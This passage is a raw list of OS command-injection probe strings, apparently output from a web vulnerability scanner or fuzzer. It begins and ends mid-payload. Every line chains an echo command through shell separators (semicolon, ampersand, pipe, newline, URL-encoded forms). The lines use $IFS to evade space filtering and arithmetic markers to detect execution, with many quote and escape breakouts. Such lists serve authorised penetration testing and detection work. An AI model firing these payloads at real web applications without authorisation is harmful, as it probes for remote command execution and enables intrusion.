QZJ)UXIQZJ\"\n%26%26echo$IFSAZHTSE$((68%2B19))$(echo$IFSAZHTSE)AZHTSE\"\n%7Cecho$IFSAISDYW$((74%2B90))$(echo$IFSAISDYW)AISDYW\"\n%7C%7Cecho$IFSFFZLXA$((31%2B49))$(echo$IFSFFZLXA)FFZLXA\"\necho$IFSIZVWCK$((54%2B72))$(echo$IFSIZVWCK)IZVWCK\n%20echo%20KBNMCF$((63%2B18))$(echo%20KBNMCF)KBNMCF\n;echo$IFSCHWBLL$((41%2B95))$(echo$IFSCHWBLL)CHWBLL\n&echo$IFSXMFEYV$((86%2B73))$(echo$IFSXMFEYV)XMFEYV\n|echo$IFSJBIOND$((76%2B13))$(echo$IFSJBIOND)JBIOND\n||echo$IFSCVUUDY$((8%2B8))$(echo$IFSCVUUDY)CVUUDY\n&&echo$IFSNOYZQL$((99%2B8))$(echo$IFSNOYZQL)NOYZQL\n%0aecho$IFSZZKJNZ$((11%2B6))$(echo$IFSZZKJNZ)ZZKJNZ\n%3Becho$IFSBLFIWK$((29%2B79))$(echo$IFSBLFIWK)BLFIWK\n%26echo$IFSKZMAVH$((10%2B87))$(echo$IFSKZMAVH)KZMAVH\n%26%26echo$IFSXGZTXT$((91%2B40))$(echo$IFSXGZTXT)XGZTXT\n%7Cecho$IFSMYOWIL$((79%2B10))$(echo$IFSMYOWIL)MYOWIL\n%7C%7Cecho$IFSLCASZZ$((36%2B54))$(echo$IFSLCASZZ)LCASZZ\necho$IFSGEYHDT$((98%2B13))$(echo$IFSGEYHDT)GEYHDT//\n%20echo%20ZDHFWD$((74%2B46))$(echo%20ZDHFWD)ZDHFWD//\n;echo$IFSWSRCRX$((45%2B83))$(echo$IFSWSRCRX)WSRCRX//\n&echo$IFSUTUDJC$((16%2B78))$(echo$IFSUTUDJC)UTUDJC//\n|echo$IFSXDYAKY$((50%2B55))$(echo$IFSXDYAKY)XDYAKY//\n||echo$IFSURZLFH$((61%2B49))$(echo$IFSURZLFH)URZLFH//\n&&echo$IFSPZLWHM$((84%2B59))$(echo$IFSPZLWHM)PZLWHM//\n%0aecho$IFSRNGRKM$((66%2B9))$(echo$IFSRNGRKM)RNGRKM//\n%3Becho$IFSMGNUUK$((47%2B60))$(echo$IFSMGNUUK)MGNUUK//\n%26echo$IFSZNUBXF$((96%2B1))$(echo$IFSZNUBXF)ZNUBXF//\n%26%26echo$IFSLOYHDY$((15%2B20))$(echo$IFSLOYHDY)LOYHDY//\n%7Cecho$IFSVVVVVP$((21%2B21))$(echo$IFSVVVVVP)VVVVVP//\n%7C%7Cecho$IFSJDZYWS$((14%2B65))$(echo$IFSJDZYWS)JDZYWS//\necho$IFSBLWDWQ$((23%2B19))$(echo$IFSBLWDWQ)BLWDWQ\\\n%20echo%20HNHGPN$((18%2B32))$(echo%20HNHGPN)HNHGPN\\\n;echo$IFSJCPFVL$((55%2B99))$(echo$IFSJCPFVL)JCPFVL\\\n&echo$IFSDZELLQ$((7%2B27))$(echo$IFSDZELLQ)DZELLQ\\\n|echo$IFSDMNIBS$((2%2B86))$(echo$IFSDMNIBS)DMNIBS\\\n||echo$IFSJNIADE$((97%2B6))$(echo$IFSJNIADE)JNIADE\\\n&&echo$IFSPKOWIK$((48%2B16))$(echo$IFSPKOWIK)PKOWIK\\\n%0aecho$IFSBYOTYG$((4%2B40))$(echo$IFSBYOTYG)BYOTYG\\\n%3Becho$IFSXLTPVN$((45%2B86))$(echo$IFSXLTPVN)XLTPVN\\\n%26echo$IFSNINVIO$((20%2B74))$(echo$IFSNINVIO)NINVIO\\\n%26%26echo$IFSMUFURB$((94%2B1))$(echo$IFSMUFURB)MUFURB\\\n%7Cecho$IFSWGMKFN$((19%2B9))$(echo$IFSWGMKFN)WGMKFN\\\n%7C%7Cecho$IFSGYKBRP$((2%2B36))$(echo$IFSGYKBRP)GYKBRP\\\necho$IFSBCFSQL$((44%2B41))$(echo$IFSBCFSQL)BCFSQL&\n%20echo%20EXSSVL$((23%2B38))$(echo%20EXSSVL)EXSSVL&\n;echo$IFSFNTIKC$((99%2B9))$(echo$IFSFNTIKC)FNTIKC&\n&echo$IFSCDQGLR$((84%2B68))$(echo$IFSCDQGLR)CDQGLR&\n|echo$IFSIPMDQM$((24%2B45))$(echo$IFSIPMDQM)IPMDQM&\n||echo$IFSXMUMCF$((41%2B92))$(echo$IFSXMUMCF)XMUMCF&\n&&echo$IFSRINUBZ$((32%2B73))$(echo$IFSRINUBZ)RINUBZ&\n%0aecho$IFSHFIVLV$((26%2B18))$(echo$IFSHFIVLV)HFIVLV&\n%3Becho$IFSVJOZLQ$((35%2B89))$(echo$IFSVJOZLQ)VJOZLQ&\n%26echo$IFSRBZNOQ$((4%2B13))$(echo$IFSRBZNOQ)RBZNOQ&\n%26%26echo$IFSDGAVAR$((61%2B22))$(echo$IFSDGAVAR)DGAVAR&\n%7Cecho$IFSIMXNSU$((31%2B19))$(echo$IFSIMXNSU)IMXNSU&\n%7C%7Cecho$IFSPTDKZC$((94%2B78))$(echo$IFSPTDKZC)PTDKZC&\necho$IFSZFQEOG$((33%2B69))$(echo$IFSZFQEOG)ZFQEOG|\n%20echo%20WBCZIC$((68%2B36))$(echo%20WBCZIC)WBCZIC|\n;echo$IFSRFYMLA$((34%2B26))$(echo$IFSRFYMLA)RFYMLA|\n&echo$IFSNCQFBP$((1%2B82))$(echo$IFSNCQFBP)NCQFBP|\n|echo$IFSHOMJAN$((98%2B15))$(echo$IFSHOMJAN)HOMJAN|\n||echo$IFSFWBTCO$((35%2B92))$(echo$IFSFWBTCO)FWBTCO|\n&&echo$IFSRSHHHN$((76%2B74))$(echo$IFSRSHHHN)RSHHHN|\n%0aecho$IFSLFCSIP$((11%2B52))$(echo$IFSLFCSIP)LFCSIP|\n%3Becho$IFSSVGWCX$((39%2B64))$(echo$IFSSVGWCX)SVGWCX|\n%26echo$IFSDNXBTT$((20%2B50))$(echo$IFSDNXBTT)DNXBTT|\n%26%26echo$IFSBEYMPV$((1%2B26))$(echo$IFSBEYMPV)BEYMPV|\n%7Cecho$IFSXBQKGF$((50%2B52))$(echo$IFSXBQKGF)XBQKGF|\n%7C%7Cecho$IFSPNDELB$((5%2B40))$(echo$IFSPNDELB)PNDELB|\necho$IFSCXOURS$((94%2B53))$(echo$IFSCXOURS)CXOURS%27\n%20echo%20INJQRH$((6%2B71))$(echo%20INJQRH)INJQRH%27\n;echo$IFSQTUCLW$((99%2B59))$(echo$IFSQTUCLW)QTUCLW%27\n&echo$IFSELNTMF$((54%2B89))$(echo$IFSELNTMF)ELNTMF%27\n|echo$IFSSXSTPH$((13%2B95))$(echo$IFSSXSTPH)SXSTPH%27\n||echo$IFSNWCALI$((76%2B93))$(echo$IFSNWCALI)NWCALI%27\n&&echo$IFSPKZNVA$((74%2B55))$(echo$IFSPKZNVA)PKZNVA%27\n%0aecho$IFSIRGGOI$((52%2B59))$(echo$IFSIRGGOI)IRGGOI%27\n%3Becho$IFSBRMMWH$((16%2B74))$(echo$IFSBRMMWH)BRMMWH%27\n%26echo$IFSXOUJEA$((42%2B77))$(echo$IFSXOUJEA)XOUJEA%27\n%26%26echo$IFSHUXXMI$((11%2B6))$(echo$IFSHUXXMI)HUXXMI%27\n%7Cecho$IFSTOMLNP$((44%2B6))$(echo$IFSTOMLNP)TOMLNP%27\n%7C%7Cecho$IFSXRJUZC$((77%2B52))$(echo$IFSXRJUZC)XRJUZC%27\necho$IFSYLWBCG$((49%2B32))$(echo$IFSYLWBCG)YLWBCG%22\n%20echo%20KHSDYB$((90%2B99))$(echo%20KHSDYB)KHSDYB%22\n;echo$IFSKYWEBG$((28%2B35))$(echo$IFSKYWEBG)KYWEBG%22\n&echo$IFSIREVYM$((76%2B29))$(echo$IFSIREVYM)IREVYM%22\n|echo$IFSYOCGJF$((96%2B37))$(echo$IFSYOCGJF)YOCGJF%22\n||echo$IFSTLJWZW$((6%2B13))$(echo$IFSTLJWZW)TLJWZW%22\n&&echo$IFSFQYHVF$((35%2B20))$(echo$IFSFQYHVF)FQYHVF%22\n%0aecho$IFSBXCEBE$((79%2B33))$(echo$IFSBXCEBE)BXCEBE%22\n%3Becho$IFSIHCKXN$((49%2B14))$(echo$IFSIHCKXN)IHCKXN%22\n%26echo$IFSUDHXJK$((28%2B24))$(echo$IFSUDHXJK)UDHXJK%22\n%26%26echo$IFSXMOMPZ$((26%2B20))$(echo$IFSXMOMPZ)XMOMPZ%22\n%7Cecho$IFSLFROFF$((34%2B43))$(echo$IFSLFROFF)LFROFF%22\n%7C%7Cecho$IFSVRKQRS$((64%2B26))$(echo$IFSVRKQRS)VRKQRS%22\necho$IFSPQLHVF$((2%2B67))$(echo$IFSPQLHVF)PQLHVF%5C%5C\n%20echo%20ZRVFNO$((8%2B89))$(echo%20ZRVFNO)ZRVFNO%5C%5C\n;echo$IFSXHQGTT$((9%2B46))$(echo$IFSXHQGTT)XHQGTT%5C%5C\n&echo$IFSRITAKD$((40%2B96))$(echo$IFSRITAKD)RITAKD%5C%5C\n|echo$IFSZIARXP$((32%2B15))$(echo$IFSZIARXP)ZIARXP%5C%5C\n||echo$IFSGJJLJU$((79%2B31))$(echo$IFSGJJLJU)GJJLJU%5C%5C\n&&echo$IFSJKTFHJ$((76%2B41))$(echo$IFSJKTFHJ)JKTFHJ%5C%5C\n%0aecho$IFSXLUCPI$((48%2B78))$(echo$IFSXLUCPI)XLUCPI%5C%5C\n%3Becho$IFSNAZRRA$((96%2B66))$(echo$IFSNAZRRA)NAZRRA%5C%5C\n%26echo$IFSOVSHWQ$((85%2B7))$(echo$IFSOVSHWQ)OVSHWQ%5C%5C\n%26%26echo$IFSBLLPPH$((41%2B65))$(echo$IFSBLLPPH)BLLPPH%5C%5C\n%7Cecho$IFSSSATLL$((5%2B73))$(echo$IFSSSATLL)SSATLL%5C%5C\n%7C%7Cecho$IFSPZVPFS$((15%2B73))$(echo$IFSPZVPFS)PZVPFS%5C%5C\necho$IFSPDGOWG$((0%2B24))$(echo$IFSPDGOWG)PDGOWG%2F%2F\n%20echo%20BZWIPM$((39%2B43))$(echo%20BZWIPM)BZWIPM%2F%2F\n;echo$IFSMPQJPO$((25%2B59))$(echo$IFSMPQJPO)MPQJPO%2F%2F\n&echo$IFSYCZAGJ$((43%2B61))$(echo$IFSYCZAGJ)YCZAGJ%2F%2F\n|echo$IFSKBEHVQ$((68%2B63))$(echo$IFSKBEHVQ)KBEHVQ%2F%2F\n||echo$IFSFXXJSB$((43%2B97))$(echo$IFSFXXJSB)FXXJSB%2F%2F\n&&echo$IFSGYBOFQ$((1%2B26))$(echo$IFSGYBOFQ)GYBOFQ%2F%2F\n%0aecho$IFSSAUSPH$((85%2B99))$(echo$IFSSAUSPH)SAUSPH%2F%2F\n%3Becho$IFSMEDOMQ$((22%2B39))$(echo$IFSMEDOMQ)MEDOMQ%2F%2F\n%26echo$IFSSCACNS$((89%2B8))$(echo$IFSSCACNS)SCACNS%2F%2F\n%26%26echo$IFSBWMKQC$((8%2B22))$(echo$IFSBWMKQC)BWMKQC%2F%2F\n%7Cecho$IFSACSCAR$((68%2B50))$(echo$IFSACSCAR)ACSCAR%2F%2F\n%7C%7Cecho$IFSIUFXEF$((53%2B74))$(echo$IFSIUFXEF)IUFXEF%2F%2F\necho$IFSODFQBQ$((97%2B35))$(echo$IFSODFQBQ)ODFQBQ%26\n%20echo%20MIJFWA$((64%2B47))$(echo%20MIJFWA)MIJFWA%26\n;echo$IFSORHOEA$((71%2B59))$(echo$IFSORHOEA)ORHOEA%26\n&echo$IFSASRUTA$((40%2B74))$(echo$IFSASRUTA)ASRUTA%26\n|echo$IFSNAGEDU$((57%2B86))$(echo$IFSNAGEDU)NAGEDU%26\n||echo$IFSCZXGHY$((46%2B9))$(echo$IFSCZXGHY)CZXGHY%26\n&&echo$IFSNIEFDN$((50%2B18))$(echo$IFSNIEFDN)NIEFDN%26\n%0aecho$IFSLHUMDB$((44%2B69))$(echo$IFSLHUMDB)LHUMDB%26\n%3Becho$IFSSWBWIU$((54%2B20))$(echo$IFSSWBWIU)SWBWIU%26\n%26echo$IFSRNWYRS$((8%2B9))$(echo$IFSRNWYRS)RNWYRS%26\n%26%26echo$IFSRYMPKL$((65%2B92))$(echo$IFSRYMPKL)RYMPKL%26\n%7Cecho$IFSSHWGOU$((49%2B48))$(echo$IFSSHWGOU)SHWGOU%26\n%7C%7Cecho$IFSHOZWON$((0%2B42))$(echo$IFSHOZWON)HOZWON%26\necho$IFSCTYHYD$((2%2B94))$(echo$IFSCTYHYD)CTYHYD%7C\n%20echo%20FKYLQT$((77%2B70))$(echo%20FKYLQT)FKYLQT%7C\n;echo$IFSXSICUY$((6%2B35))$(echo$IFSXSICUY)XSICUY%7C\n&echo$IFSCQTRHA$((48%2B25))$(echo$IFSCQTRHA)CQTRHA%7C\n|echo$IFSSZYRBG$((69%2B52))$(echo$IFSSZYRBG)SZYRBG%7C\n||echo$IFSOSSFDF$((81%2B9))$(echo$IFSOSSFDF)OSSFDF%7C\n&&echo$IFSIIUTLW$((40%2B43))$(echo$IFSIIUTLW)IIUTLW%7C\n%0aecho$IFSIEMDKC$((84%2B27))$(echo$IFSIEMDKC)IEMDKC%7C\n%3Becho$IFSJJRDLY$((50%2B38))$(echo$IFSJJRDLY)JJRDLY%7C\n%26echo$IFSKKDTAV$((24%2B52))$(echo$IFSKKDTAV)KKDTAV%7C\n%26%26echo$IFSHKTTXB$((80%2B17))$(echo$IFSHKTTXB)HKTTXB%7C\n%7Cecho$IFSBJUKKI$((91%2B15))$(echo$IFSBJUKKI)BJUKKI%7C\n%7C%7Cecho$IFSWFBDXM$((8%2B58))$(echo$IFSWFBDXM)WFBDXM%7C\n'echo$IFSMEFODD$((49%2B43))$(echo$IFSMEFODD)MEFODD\n'%20echo%20DKPBFA$((11%2B2))$(echo%20DKPBFA)DKPBFA\n';echo$IFSJNEQYI$((45%2B53))$(echo$IFSJNEQYI)JNEQYI\n'&echo$IFSVXICUW$((74%2B51))$(echo$IFSVXICUW)VXICUW\n'|echo$IFSBJGHKO$((79%2B18))$(echo$IFSBJGHKO)BJGHKO\n'||echo$IFSHMEDQM$((69%2B73))$(echo$IFSHMEDQM)HMEDQM\n'&&echo$IFSNKJIAU$((64%2B2))$(echo$IFSNKJIAU)NKJIAU\n'%0aecho$IFSDENYJC$((91%2B76))$(echo$IFSDENYJC)DENYJC\n'%3Becho$IFSVZDGLS$((78%2B51))$(echo$IFSVZDGLS)VZDGLS\n'%26echo$IFSMYWSGV$((8%2B92))$(echo$IFSMYWSGV)MYWSGV\n'%26%26echo$IFSSDYEBH$((96%2B90))$(echo$IFSSDYEBH)SDYEBH\n'%7Cecho$IFSKVFINL$((98%2B1))$(echo$IFSKVFINL)KVFINL\n'%7C%7Cecho$IFSBNFEWG$((17%2B39))$(echo$IFSBNFEWG)BNFEWG\n'echo$IFSEOXXHA$((67%2B86))$(echo$IFSEOXXHA)EOXXHA'\n'%20echo%20ROHIPP$((50%2B29))$(echo%20ROHIPP)ROHIPP'\n';echo$IFSRFBYSO$((8%2B13))$(echo$IFSRFBYSO)RFBYSO'\n'&echo$IFSIZVZGQ$((7%2B67))$(echo$IFSIZVZGQ)IZVZGQ'\n'|echo$IFSANVKGR$((37%2B60))$(echo$IFSANVKGR)ANVKGR'\n'||echo$IFSVBATPV$((60%2B79))$(echo$IFSVBATPV)VBATPV'\n'&&echo$IFSGYGLII$((94%2B74))$(echo$IFSGYGLII)GYGLII'\n'%0aecho$IFSEPGLGV$((67%2B48))$(echo$IFSEPGLGV)EPGLGV'\n'%3Becho$IFSXZROZE$((34%2B62))$(echo$IFSXZROZE)XZROZE'\n'%26echo$IFSTYRLAC$((15%2B80))$(echo$IFSTYRLAC)TYRLAC'\n'%26%26echo$IFSRFOIHP$((11%2B2))$(echo$IFSRFOIHP)RFOIHP'\n'%7Cecho$IFSRRSKSU$((82%2B69))$(echo$IFSRRSKSU)RRSKSU'\n'%7C%7Cecho$IFSTCDXDV$((24%2B86))$(echo$IFSTCDXDV)TCDXDV'\n'echo$IFSJWHAWX$((24%2B49))$(echo$IFSJWHAWX)JWHAWX\"\n'%20echo%20DHXKNT$((83%2B17))$(echo%20DHXKNT)DHXKNT\"\n';echo$IFSIYVDAV$((58%2B88))$(echo$IFSIYVDAV)IYVDAV\"\n'&echo$IFSUSKOQC$((80%2B64))$(echo$IFSUSKOQC)USKOQC\"\n'|echo$IFSPZXCHL$((23%2B27))$(echo$IFSPZXCHL)PZXCHL\"\n'||echo$IFSHZAALW$((51%2B4))$(echo$IFSHZAALW)HZAALW\"\n'&&echo$IFSBDQKRH$((34%2B46))$(echo$IFSBDQKRH)BDQKRH\"\n'%0aecho$IFSJQCWHP$((66%2B43))$(echo$IFSJQCWHP)JQCWHP\"\n'%3Becho$IFSAOVBIV$((21%2B3))$(echo$IFSAOVBIV)AOVBIV\"\n'%26echo$IFSSYOFDN$((87%2B15))$(echo$IFSSYOFDN)SYOFDN\"\n'%26%26echo$IFSTIZZUZ$((99%2B85))$(echo$IFSTIZZUZ)TIZZUZ\"\n'%7Cecho$IFSYCCUIZ$((60%2B63))$(echo$IFSYCCUIZ)YCCUIZ\"\n'%7C%7Cecho$IFSVFIJUP$((58%2B16))$(echo$IFSVFIJUP)VFIJUP\"\n'echo$IFSKZIGXE$((85%2B95))$(echo$IFSKZIGXE)KZIGXE\n'%20echo%20IILRDW$((70%2B47))$(echo%20IILRDW)IILRDW\n';echo$IFSHXTARE$((60%2B40))$(echo$IFSHXTARE)HXTARE\n'&echo$IFSZFQGSY$((67%2B86))$(echo$IFSZFQGSY)ZFQGSY\n'|echo$IFSBTCBHW$((54%2B8))$(echo$IFSBTCBHW)BTCBHW\n'||echo$IFSTQUEWX$((62%2B61))$(echo$IFSTQUEWX)TQUEWX\n'&&echo$IFSQCRXUV$((17%2B13))$(echo$IFSQCRXUV)QCRXUV\n'%0aecho$IFSUOWFKR$((67%2B63))$(echo$IFSUOWFKR)UOWFKR\n'%3Becho$IFSTJRXTN$((69%2B61))$(echo$IFSTJRXTN)TJRXTN\n'%26echo$IFSDVJEEK$((20%2B0))$(echo$IFSDVJEEK)DVJEEK\n'%26%26echo$IFSNIRIZQ$((64%2B4))$(echo$IFSNIRIZQ)NIRIZQ\n'%7Cecho$IFSFGVWTS$((53%2B41))$(echo$IFSFGVWTS)FGVWTS\n'%7C%7Cecho$IFSONXHJN$((84%2B16))$(echo$IFSONXHJN)ONXHJN\n'echo$IFSMHUBAH$((13%2B52))$(echo$IFSMHUBAH)MHUBAH//\n'%20echo%20OBUGDN$((69%2B8))$(echo%20OBUGDN)OBUGDN//\n';echo$IFSZQZKMV$((83%2B46))$(echo$IFSZQZKMV)ZQZKMV//\n'&echo$IFSDJQYUP$((21%2B12))$(echo$IFSDJQYUP)DJQYUP//\n'|echo$IFSXMLIVZ$((57%2B49))$(echo$IFSXMLIVZ)XMLIVZ//\n'||echo$IFSHBYFDI$((44%2B65))$(echo$IFSHBYFDI)HBYFDI//\n'&&echo$IFSWCCAON$((69%2B13))$(echo$IFSWCCAON)WCCAON//\n'%0aecho$IFSWHMVQH$((51%2B53))$(echo$IFSWHMVQH)WHMVQH//\n'%3Becho$IFSTMWIFK$((5%2B69))$(echo$IFSTMWIFK)TMWIFK//\n'%26echo$IFSZJHAFI$((51%2B78))$(echo$IFSZJHAFI)ZJHAFI//\n'%26%26echo$IFSDSUEVY$((21%2B5))$(echo$IFSDSUEVY)DSUEVY//\n'%7Cecho$IFSHUIGCW$((90%2B23))$(echo$IFSHUIGCW)HUIGCW//\n'%7C%7Cecho$IFSBSPLUO$((96%2B67))$(echo$IFSBSPLUO)BSPLUO//\n'echo$IFSWTMGEX$((31%2B97))$(echo$IFSWTMGEX)WTMGEX\\\n'%20echo%20YLUZLM$((52%2B54))$(echo%20YLUZLM)YLUZLM\\\n';echo$IFSYRIWFC$((51%2B76))$(echo$IFSYRIWFC)YRIWFC\\\n'&echo$IFSHDKHON$((74%2B41))$(echo$IFSHDKHON)HDKHON\\\n'|echo$IFSQMGDOR$((26%2B14))$(echo$IFSQMGDOR)QMGDOR\\\n'||echo$IFSVWMBCL$((58%2B34))$(echo$IFSVWMBCL)VWMBCL\\\n'&&echo$IFSAECLDN$((15%2B72))$(echo$IFSAECLDN)AECLDN\\\n'%0aecho$IFSLLJNSS$((65%2B11))$(echo$IFSLLJNSS)LLJNSS\\\n'%3Becho$IFSYIYMKI$((91%2B72))$(echo$IFSYIYMKI)YIYMKI\\\n'%26echo$IFSANEBTG$((60%2B67))$(echo$IFSANEBTG)ANEBTG\\\n'%26%26echo$IFSLLLNBB$((5%2B69))$(echo$IFSLLLNBB)LLLNBB\\\n'%7Cecho$IFSDUIYBT$((30%2B8))$(echo$IFSDUIYBT)DUIYBT\\\n'%7C%7Cecho$IFSBZCSNS$((71%2B69))$(echo$IFSBZCSNS)BZCSNS\\\n'echo$IFSUCMQAW$((90%2B56))$(echo$IFSUCMQAW)UCMQAW&\n'%20echo%20MCIHDY$((46%2B63))$(echo%20MCIHDY)MCIHDY&\n';echo$IFSTXFXOH$((52%2B49))$(echo$IFSTXFXOH)TXFXOH&\n'&echo$IFSJGGFVO$((61%2B53))$(echo$IFSJGGFVO)JGGFVO&\n'|echo$IFSFUKEZB$((71%2B34))$(echo$IFSFUKEZB)FUKEZB&\n'||echo$IFSDBSTLF$((93%2B67))$(echo$IFSDBSTLF)DBSTLF&\n'&&echo$IFSJJWTOM$((43%2B29))$(echo$IFSJJWTOM)JJWTOM&\n'%0aecho$IFSUZEOGM$((31%2B46))$(echo$IFSUZEOGM)UZEOGM&\n'%3Becho$IFSMWZRJO$((7%2B81))$(echo$IFSMWZRJO)MWZRJO&\n'%26echo$IFSFRPBJA$((6%2B14))$(echo$IFSFRPBJA)FRPBJA&\n'%26%26echo$IFSLRQJZI$((98%2B24))$(echo$IFSLRQJZI)LRQJZI&\n'%7Cecho$IFSHYUMCY$((48%2B63))$(echo$IFSHYUMCY)HYUMCY&\n'%7C%7Cecho$IFSJMIQOC$((14%2B31))$(echo$IFSJMIQOC)JMIQOC&\n'echo$IFSKFKPRE$((22%2B12))$(echo$IFSKFKPRE)KFKPRE|\n'%20echo%20HYHGIN$((59%2B21))$(echo%20HYHGIN)HYHGIN|\n';echo$IFSTDCNYP$((73%2B27))$(echo$IFSTDCNYP)TDCNYP|\n'&echo$IFSJSKJAE$((33%2B64))$(echo$IFSJSKJAE)JSKJAE|\n'|echo$IFSFRUDYQ$((30%2B6))$(echo$IFSFRUDYQ)FRUDYQ|\n'||echo$IFSACFFZC$((29%2B51))$(echo$IFSACFFZC)ACFFZC|\n'&&echo$IFSDSTIDD$((87%2B89))$(echo$IFSDSTIDD)DSTIDD|\n'%0aecho$IFSOMOAWG$((37%2B16))$(echo$IFSOMOAWG)OMOAWG|\n'%3Becho$IFSAWTTNW$((97%2B93))$(echo$IFSAWTTNW)AWTTNW|\n'%26echo$IFSYOYHYT$((87%2B32))$(echo$IFSYOYHYT)YOYHYT|\n'%26%26echo$IFSOSNMTB$((17%2B53))$(echo$IFSOSNMTB)OSNMTB|\n'%7Cecho$IFSRSOBXL$((32%2B20))$(echo$IFSRSOBXL)RSOBXL|\n'%7C%7Cecho$IFSIYFUTC$((35%2B6))$(echo$IFSIYFUTC)IYFUTC|\n'echo$IFSZAZMGS$((53%2B59))$(echo$IFSZAZMGS)ZAZMGS%27\n'%20echo%20DHZGBM$((36%2B86))$(echo%20DHZGBM)DHZGBM%27\n';echo$IFSTVUUPM$((41%2B77))$(echo$IFSTVUUPM)TVUUPM%27\n'&echo$IFSQKZYPP$((55%2B27))$(echo$IFSQKZYPP)QKZYPP%27\n'|echo$IFSMTYEZK$((2%2B28))$(echo$IFSMTYEZK)MTYEZK%27\n'||echo$IFSUYEKYZ$((46%2B2))$(echo$IFSUYEKYZ)UYEKYZ%27\n'&&echo$IFSUGEJWF$((34%2B81))$(echo$IFSUGEJWF)UGEJWF%27\n'%0aecho$IFSCSOREC$((72%2B24))$(echo$IFSCSOREC)CSOREC%27\n'%3Becho$IFSXQAHUL$((9%2B99))$(echo$IFSXQAHUL)XQAHUL%27\n'%26echo$IFSYKAMSD$((84%2B71))$(echo$IFSYKAMSD)YKAMSD%27\n'%26%26echo$IFSYILVWF$((53%2B73))$(echo$IFSYILVWF)YILVWF%27\n'%7Cecho$IFSDZZJRA$((36%2B84))$(echo$IFSDZZJRA)DZZJRA%27\n'%7C%7Cecho$IFSXSKAQD$((19%2B93))$(echo$IFSXSKAQD)XSKAQD%27\n'echo$IFSQUCSSY$((71%2B59))$(echo$IFSQUCSSY)QUCSSY%22\n'%20echo%20SZQVUT$((92%2B45))$(echo%20SZQVUT)SZQVUT%22\n';echo$IFSRXCILT$((66%2B76))$(echo$IFSRXCILT)RXCILT%22\n'&echo$IFSQYHHIE$((90%2B44))$(echo$IFSQYHHIE)QYHHIE%22\n'|echo$IFSUDMWDN$((49%2B29))$(echo$IFSUDMWDN)UDMWDN%22\n'||echo$IFSCOBRKP$((22%2B48))$(echo$IFSCOBRKP)COBRKP%22\n'&&echo$IFSRXIGIR$((86%2B76))$(echo$IFSRXIGIR)RXIGIR%22\n'%0aecho$IFSKNXEIF$((67%2B64))$(echo$IFSKNXEIF)KNXEIF%22\n'%3Becho$IFSGKNHWZ$((67%2B92))$(echo$IFSGKNHWZ)GKNHWZ%22\n'%26echo$IFSZZQBNP$((52%2B31))$(echo$IFSZZQBNP)ZZQBNP%22\n'%26%26echo$IFSRGMUUX$((81%2B39))$(echo$IFSRGMUUX)RGMUUX%22\n'%7Cecho$IFSGRFQBP$((21%2B44))$(echo$IFSGRFQBP)GRFQBP%22\n'%7C%7Cecho$IFSYIJMHI$((78%2B15))$(echo$IFSYIJMHI)YIJMHI%22\n'echo$IFSATMXIQ$((94%2B83))$(echo$IFSATMXIQ)ATMXIQ%5C%5C\n'%20echo%20QIIZIS$((83%2B28))$(echo%20QIIZIS)QIIZIS%5C%5C\n';echo$IFSOGZZLG$((82%2B8))$(echo$IFSOGZZLG)OGZZLG%5C%5C\n'&echo$IFSSFRDQJ$((5%2B47))$(echo$IFSSFRDQJ)SFRDQJ%5C%5C\n'|echo$IFSBLUOBR$((48%2B93))$(echo$IFSBLUOBR)BLUOBR%5C%5C\n'||echo$IFSWPLOYN$((11%2B61))$(echo$IFSWPLOYN)WPLOYN%5C%5C\n'&&echo$IFSEEAOWX$((31%2B37))$(echo$IFSEEAOWX)EEAOWX%5C%5C\n'%0aecho$IFSMRGXMQ$((93%2B20))$(echo$IFSMRGXMQ)MRGXMQ%5C%5C\n'%3Becho$IFSZIXZTA$((54%2B19))$(echo$IFSZIXZTA)ZIXZTA%5C%5C\n'%26echo$IFSQJCJTG$((15%2B71))$(echo$IFSQJCJTG)QJCJTG%5C%5C\n'%26%26echo$IFSWGUUQS$((22%2B59))$(echo$IFSWGUUQS)WGUUQS%5C%5C\n'%7Cecho$IFSNOZCLT$((80%2B49))$(echo$IFSNOZCLT)NOZCLT%5C%5C\n'%7C%7Cecho$IFSFOGUOT$((12%2B4))$(echo$IFSFOGUOT)FOGUOT%5C%5C\n'echo$IFSFMBTIT$((34%2B36))$(echo$IFSFMBTIT)FMBTIT%2F%2F\n'%20echo%20LCUPUI$((67%2B12))$(echo%20LCUPUI)LCUPUI%2F%2F\n';echo$IFSYSBEUY$((50%2B96))$(echo$IFSYSBEUY)YSBEUY%2F%2F\n'&echo$IFSGOHLRL$((41%2B27))$(echo$IFSGOHLRL)GOHLRL%2F%2F\n'|echo$IFSLBYJEO$((76%2B85))$(echo$IFSLBYJEO)LBYJEO%2F%2F\n'||echo$IFSBGABHN$((68%2B69))$(echo$IFSBGABHN)BGABHN%2F%2F\n'&&echo$IFSARLFCX$((76%2B3))$(echo$IFSARLFCX)ARLFCX%2F%2F\n'%0aecho$IFSJVJBOI$((72%2B33))$(echo$IFSJVJBOI)JVJBOI%2F%2F\n'%3Becho$IFSYYDENG$((25%2B38))$(echo$IFSYYDENG)YYDENG%2F%2F\n'%26echo$IFSSGWYGH$((17%2B18))$(echo$IFSSGWYGH)SGWYGH%2F%2F\n'%26%26echo$IFSQGCAOI$((72%2B57))$(echo$IFSQGCAOI)QGCAOI%2F%2F\n'%7Cecho$IFSHISNBC$((79%2B7))$(echo$IFSHISNBC)HISNBC%2F%2F\n'%7C%7Cecho$IFSZFQBBS$((42%2B5))$(echo$IFSZFQBBS)ZFQBBS%2F%2F\n'echo$IFSMDCMCB$((27%2B53))$(echo$IFSMDCMCB)MDCMCB%26\n'%20echo%20CXKSQZ$((18%2B22))$(echo%20CXKSQZ)CXKSQZ%26\n';echo$IFSPICODU$((19%2B82))$(echo$IFSPICODU)PICODU%26\n'&echo$IFSCHNLIU$((42%2B39))$(echo$IFSCHNLIU)CHNLIU%26\n'|echo$IFSGCIZYI$((9%2B92))$(echo$IFSGCIZYI)GCIZYI%26\n'||echo$IFSNWOOGT$((48%2B45))$(echo$IFSNWOOGT)NWOOGT%26\n'&&echo$IFSZRWXZK$((81%2B67))$(echo$IFSZRWXZK)ZRWXZK%26\n'%0aecho$IFSWTIGNL$((88%2B19))$(echo$IFSWTIGNL)WTIGNL%26\n'%3Becho$IFSGOOQAC$((3%2B23))$(echo$IFSGOOQAC)GOOQAC%26\n'%26echo$IFSCAIGIC$((51%2B44))$(echo$IFSCAIGIC)CAIGIC%26\n'%26%26echo$IFSBGZLBN$((42%2B92))$(echo$IFSBGZLBN)BGZLBN%26\n'%7Cecho$IFSALJRYG$((7%2B49))$(echo$IFSALJRYG)ALJRYG%26\n'%7C%7Cecho$IFSTXFGBP$((28%2B0))$(echo$IFSTXFGBP)TXFGBP%26\n'e